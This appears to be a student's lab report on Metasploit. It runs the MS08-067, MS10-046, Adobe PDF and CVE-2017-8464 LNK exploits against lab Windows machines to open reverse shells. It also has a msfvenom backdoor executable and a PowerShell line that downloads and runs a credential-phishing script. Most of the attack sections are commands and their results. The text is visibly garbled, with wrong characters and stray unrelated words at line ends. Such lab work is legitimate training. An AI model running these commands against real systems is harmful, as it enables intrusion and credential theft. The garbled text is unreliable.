20154301 仉鑫燁html
問題:如用本身的話解釋什麼是exploit
,payload
,encode
?git
①exploit就至關因而載具,將真正要負責攻擊的代碼傳送到靶機中,我以爲老師上課舉的火箭和衛星的例子很是形象,火箭只是運載工具,它把衛星送入軌道就完成了它的任務,exploit的功能就和火箭差很少。github
②payload也就至關於載荷,實際上就是以前咱們實驗中作到的shellcode,exploit把它傳送到靶機中後,它就負責執行相應的攻擊代碼。shell
③encode也就是編碼,它主要是爲了不以前的payload中出現壞字符,從而影響payload的功能,其次是爲了實現免殺,不讓殺毒軟件很輕易的就發現payload是攻擊代碼。windows
參考學長的報告內容,選用XP英文版虛擬機。api
首先查看兩個主機的IP地址
瀏覽器
在Kali上使用msfconsole
指令進入msf控制檯。網絡
kali主機鍵入search ms08_067
指令查詢一下針對該漏洞能夠運用的攻擊模塊: session
鍵入use exploit/windows/smb/ms08_067_netapi
,使用該模塊,再使用show payloads
查看能夠供咱們使用的payload: tcp
咱們的目的是爲了獲取靶機的shell,所以這裏咱們選擇經過反向鏈接來獲取shell的generic/shell_reverse_tcp。當payload,使用指令set payload generic/shell_reverse_tcp
對payload
進行設置。
接着使用指令show options
查看咱們須要設置的參數,發現須要設置一個RHOST(遠程主機,即靶機的IP地址)和一個LHOST(本地主機,即攻擊機的IP地址):
set RHOST 192.168.108.132 set LHOST 192.168.108.128 set target 0
設置完相應的參數後,再次使用show options
對攻擊的選項進行查看:
接着使用exploit
指令開始攻擊,攻擊成功後獲取了靶機的shell,使用systeminfo
指令查看靶機系統信息:
基本步驟仍是和上面同樣,先利用search ms10_046
指令查看能夠運用的攻擊模塊:
用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用該模塊,再使用show payloads查看能夠供咱們使用的payload:
而後查看須要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,因此這裏SRVHOST和LHOST都應該填攻擊機的IP地址:
出錯:IP地址因不明緣由變更,致使實驗浪費大量時間
set LHOST 192.168.108.133 set SRVHOST 192.168.108.133
設置好參數後,進行查看:
使用exploit指令執行漏洞,能夠看到生成了一個url:
在靶機的IE瀏覽器上使用該url進行訪問,在MSF終端看見漏洞執行成功:
使用sessions
指令查看當前存在的會話,能夠看到存在一個ID爲1的會話:
使用sessions -i 1
選擇會話1,成功獲取了靶機的shell,利用systeminfo
指令查看靶機的系統信息:
search adobe
查詢和adobe漏洞有關的模塊,我選擇的是use exploit/windows/fileformat/adobe_toolbutton
,而後使用該模塊,設置回連的payload
: set LHOST 192.168.108.133 set LPORT 4301 set FILENAME 20154301.pdf
查看須要設置的參數:
設置好相應參數後,開始實施攻擊,發如今/root/.msf4/local/
目錄下成功生成了一個lxm.pdf
文件:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.108.133 set LPORT 4301
而後將該文件傳送到靶機上,而且在攻擊機上打開監聽:
將靶機中的pdf文件打開,攻擊機成功獲取到靶機shell:
show auxiliary
查看能夠運用的輔助模塊。 set RHOSTS 192.168.108.133 set THREADS 10
我使用的是scanner/smb/smb_version
,用來對靶機的smb
版本進行掃描。
設置靶機的IP地址(也能夠設置要掃描的一段範圍),以及掃描使用的線程:
使用exploit
指令開始掃描,成功掃描到靶機的smb
版本:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.108.133 LPORT=4444 -f exe> /opt/bk.exe
msf> use multi/handler msf exploit(handler )> set payload windows/meterpreter/reverse_https msf exploit(handler )> set lhost 192.168.108.133 msf exploit(handler )> set lport 4444 msf exploit(handler )> exploit
powershel遠程下載並執行: powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1’)); Invoke-LoginPrompt
一旦目標受害者遠程成功登陸,便可在msf反彈shell中看到密碼。可是他一直沒有彈出登陸框,研究頗有仍是沒有明白。
RCE漏洞存在於Windows處理LNK文件的環節。攻擊者利用漏洞能夠得到與本地用戶相同的用戶權限。被使用此漏洞攻擊時,用戶權限較少的帳戶相較管理員權限的用戶受到的影響更小。
攻擊者能夠給受害者一個惡意的LNK 文件和關聯的惡意二進制,文件能夠存放在可移動磁盤或遠程共享中。當用戶用 Windows 資源管理器或任何其餘可以解析LNK文件的軟件,打開此驅動器 (或遠程共享) 時,惡意文件就會在目標系統上執行攻擊者的代碼。
kali主機下載cve_2017_8464_lnk_rce.rb: cd /opt
wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
uploading-image-290136.png
將cve_2017_8464_lnk_rce.rb拷貝到
/usr/share/metasploit-framework/modules/exploit/windows/smb/目錄下: cp cve_2017_8464_lnk_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.108.133 msf exploit(handler) > exploit -j 
msf exploit(handler) > back msf > use exploit/windows/smb/cve_2017_8464_lnk_rce msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.108.133 msf exploit(cve_2017_8464_lnk_rce) > exploit
將/root/.msf4/local/*全部文件拷貝到/opt目錄下的test文件夾中,而後拷貝到目標靶機windows7X64上
而後點擊快捷鍵,就會觸發註冊dll文件,若是不行直接註冊dll文件(通常是將這項快捷鍵和DLL文件拷貝到一個文件夾裏面而後拷貝到U盤,只要對方開了U盤自動啓動播放功能,就會自動觸發註冊dll文件)
在kali下能夠看到成功得到sesions會話爲1(後來因爲某些不可描述的緣由失敗了,最終7成功)
而後進入到會話,就會成功進入到metermter的shell界面: